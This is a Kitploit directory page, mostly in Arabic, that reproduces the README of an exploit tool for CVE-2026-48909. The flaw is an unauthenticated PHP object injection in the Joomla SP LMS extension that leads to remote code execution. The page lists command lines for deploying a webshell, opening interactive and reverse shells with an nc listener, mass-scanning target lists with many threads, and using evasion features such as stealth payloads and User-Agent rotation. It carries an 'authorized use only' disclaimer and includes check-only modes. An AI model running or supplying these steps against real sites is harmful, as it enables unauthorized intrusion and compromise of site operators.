Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-48909-Joomla-SP-Exploit — CVE-2026-48909 - استغلال حقن كائن PHP غير مصادق عليه إلى RCE لملحق Joomla SP LMS الإصدارات <= 4.1.3. يستغل إلغاء تسلسل ملف تعريف الارتباط lmsOrders لكتابة قشرة ويب عبر سلسلة أدوات FormattedtextLogger في Joomla. يتضمن قشرة تفاعلية، واكتشاف المسار، والتنظيف. لاختبار الأمان المصرح به فقط. | Kitploit
أدوات/GitHubGitHub/cerberusmrxi/cve-2026-48909-joomla-sp-exploit
تحليل الثغرات الأمنيةتحليل الكودالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمالفريق الأحمر
تطوير الحمولات
مختبرات وتدريب عملي
GitHubcerberusmrxi/cve-2026-48909-joomla-sp-exploit

CVE-2026-48909-Joomla-SP-Exploit

عرض المستودع
215منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

CVE-2026-48909 - استغلال حقن كائن PHP غير مصادق عليه إلى RCE لملحق Joomla SP LMS الإصدارات <= 4.1.3. يستغل إلغاء تسلسل ملف تعريف الارتباط lmsOrders لكتابة قشرة ويب عبر سلسلة أدوات FormattedtextLogger في Joomla. يتضمن قشرة تفاعلية، واكتشاف المسار، والتنظيف. لاختبار الأمان المصرح به فقط.

مشاركة

CVE-2026-48909

Joomla SP LMS — حقن كائنات PHP غير موثَّق → تنفيذ أوامر عن بُعد

Python Version CVSS License Platform

أداة إثبات المفهوم لتقييم CVE-2026-48909
المؤلف: Sudeepa Wanigarathna

joomla1

[!IMPORTANT] للاستخدام المصرّح به فقط. هذه الأداة مخصّصة للبحث الأمني والتعليم واختبار الأنظمة التي تملكها أو لديك إذن كتابي صريح لاختبارها. الوصول غير المصرّح به إلى أنظمة الحاسوب غير قانوني. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.


جدول المحتويات

  • نظرة عامة
  • تفاصيل الثغرة
  • الميزات
  • التثبيت
  • بداية سريعة
  • دليل الاستخدام
  • مرجع الأوامر
  • أنواع الحِمْل
  • سلسلة الهجوم
  • أمثلة المخرجات
  • استكشاف الأخطاء
  • هيكل المستودع
  • تاريخ الإصدارات
  • إخلاء المسؤولية
  • المؤلف

نظرة عامة

CVE-2026-48909 هي ثغرة حقن كائنات PHP غير موثَّق خطيرة في إضافة SP LMS الخاصة بـ Joomla. تنفّذ هذه الأداة سلسلة الهجوم الكاملة ليتمكّن مختصو الأمن من التحقق من التأثير في بيئات المختبر أو البيئات المصرّح بها.

تغطّي الأداة الاكتشاف، واستكشاف المسار، وتوصيل الحِمْل، واستغلال تفاعلي بعد الاستغلال (حيثما يُسمح)، والتقييم الجماعي، والتنظيف الاختياري.


تفاصيل الثغرة

السمةالقيمة
معرف CVECVE-2026-48909
CVSS9.5 (حرجة)
متجه الهجومشبكة — غير موثَّق
التأثيرتنفيذ أوامر عن بُعد
المنتج المتأثرJoomla SP LMS
الإصدارات المتأثرة1.0.0 – 4.1.3
الإصدار المُصحَّحSP LMS 4.1.4+
سلسلة الأدوات (Gadget Chain)تتطلب Joomla < 5.2.2

مصفوفة التوافق

المكوّنالإصدارRCE
SP LMS< 4.1.4معرّض للثغرة
SP LMS≥ 4.1.4مُصحَّح
Joomla< 5.2.2سلسلة الأدوات قابلة للاستخدام
Joomla≥ 5.2.2سلسلة الأدوات مُصحَّحة

الميزات

الأساسية

الإمكانيةالوصف
استغلال غير موثَّقلا حاجة لبيانات اعتماد
حمولات متعددة7 متغيرات لشيل الويب / تنفيذ الأوامر
شيل تفاعليجلسة تاريخ الأوامر بعد النشر
اكتشاف المساراستكشاف تلقائي للمسارات القابلة للكتابة
تنظيفإزالة شيل الويب المُنشَر بعد الاختبارات

التقييم والعمليات

الإمكانيةالوصف
مسح جماعيقوائم أهداف متعددة الخيوط (1000+)
دعم الوكيل (Proxy)HTTP/SOCKS (Burp، ZAP، إلخ)
شيل عكسيحمولات قائمة على المُستمِع
وضع التخفيقنوات أوامر عبر الترويسة أو POST
العشوائيةأسماء UUID للشيل، تدوير User-Agent
إعداد التقاريرتصدير بصيغة JSON أو HTML أو CSV
مساعدات الكشففحص إصدار Joomla، --check-only، --safe-mode

ملاحظات حول التهرب

  • يتجنّب الأحرف المحظورة بواسطة فلتر cmd في Joomla قدر الإمكان
  • مسار كتابة PHP مشفّر بالنظام الست عشري لتقليل مشكلات الوسادة (padding) / الشرطة المائلة في base64
  • تأخيرات قابلة للتكوين وتدوير User-Agent
  • منطق إعادة المحاولة عبر عدة مرشّحات للحقن / المسار

التثبيت

المتطلبات الأساسية

  • Python 3.6+
  • pip
  • إمكانية الوصول الشبكي إلى الهدف (الأهداف) قيد الاختبار

الإعداد

cd exploit

python3 -m venv venv
source venv/bin/activate          # Windows: venv\Scripts\activate

pip install -r requirements.txt

python3 "CVE-2026-48909 v3.0.py" --help

التبعيات

requests>=2.31.0
urllib3>=2.0.0

argparse يأتي مع المكتبة القياسية لـ Python؛ لا يحتاج إلى تثبيت عبر pip.


بداية سريعة

استبدل https://target.example بهدف مختبر أو مصرّح به فقط.

هدف واحد — اكتشاف المسار + شيل تفاعلي

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

فحص آمن (بدون استغلال)

python3 "CVE-2026-48909 v3.0.py" https://target.example --check-only
python3 "CVE-2026-48909 v3.0.py" https://target.example --safe-mode

مسح جماعي

python3 "CVE-2026-48909 v3.0.py" --targets targets.txt --threads 20 --export results.html --export-format html

شيل عكسي (مختبر مصرّح به)

# المستمع
nc -lvnp 4444

# مضيف الاستغلال
python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path \
  --shell-type reverse \
  --reverse-host 192.168.1.100 \
  --reverse-port 4444

دليل الاستخدام

اكتشاف المسار

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path

مسار كتابة معروف

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /var/www/html/tmp/shell.php

جلسة تفاعلية

python3 "CVE-2026-48909 v3.0.py" https://target.example --find-path --interactive

أمر لمرة واحدة

python3 "CVE-2026-48909 v3.0.py" https://target.example --path /tmp/x.php --cmd "id"

حمولة تخفّي + تفاعلي

python3 "CVE-2026-48909 v3.0.py" https://target.example --shell-type stealth --find-path --interactive

وكيل (Burp / ZAP)

python3 "CVE-2026-48909 v3.0.py" https://target.example \
  --find-path --interactive \
  --proxy http://127.0.0.1:8080 \
  --insecure

التنظيف

python3 "CVE-2026-48909 v3.0.py" https://target.example --cleanup /tmp/x.php

تنسيق قائمة الأهداف

https://lab-a.example
https://lab-b.example
https://lab-c.example
python3 "CVE-2026-48909 v3.0.py" -T targets.txt --threads 50 --export scan.json

مرجع الأوامر

الهدف

الوسيطةالوصف
targetعنوان URL للهدف الواحد
--targets, -T FILEملف يحتوي على الأهداف (عنوان URL في كل سطر)
--path PATHالمسار المطلق على الخادم لشيل الويب
--shell-type TYPEminimal، standard، stealth، base64، full، reverse، blindshell
--shell-name NAMEاسم ملف شيل الويب (الافتراضي: x.php)

الشبكة

الوسيطةالوصف
--timeout SECONDSمهلة الطلب (الافتراضي: 15)
--insecureتخطي التحقق من شهادة TLS
--proxy URLمثال: http://127.0.0.1:8080
--random-uaتدوير User-Agent (مفعل افتراضياً)
--delay SECONDSتأخير بين الطلبات

الشيل العكسي

الوسيطةالوصف
--reverse-host HOSTمضيف المستمع
--reverse-port PORTمنفذ المستمع

الأوضاع

الوسيطةالوصف
--interactive, -iشيل تفاعلي بعد النشر
--check-onlyفحص الثغرة فقط
--safe-modeاختبار غير تخريبي
--find-pathاكتشاف تلقائي لمسار قابل للكتابة
--cmd COMMANDتنفيذ أمر واحد ثم الخروج
--cleanup PATHإزالة شيل الويب عند المسار المحدد
--cleanup-afterالتنظيف بعد الاستغلال

المسح الجماعي / التقرير

الوسيطةالوصف
--threads NUMعدد خيوط العمل (الافتراضي: 10)
--export FILEمسار مخرجات النتائج
--export-format FORMATjson، html، csv (الافتراضي: json)

التسجيل

الوسيطةالوصف
--log-file FILEكتابة السجلات إلى ملف
--quiet, -qوضع صامت
--verbose, -vإخراج مفصل
--no-bannerإخفاء الشعار

أنواع الحِمْل

تنزيل الأداة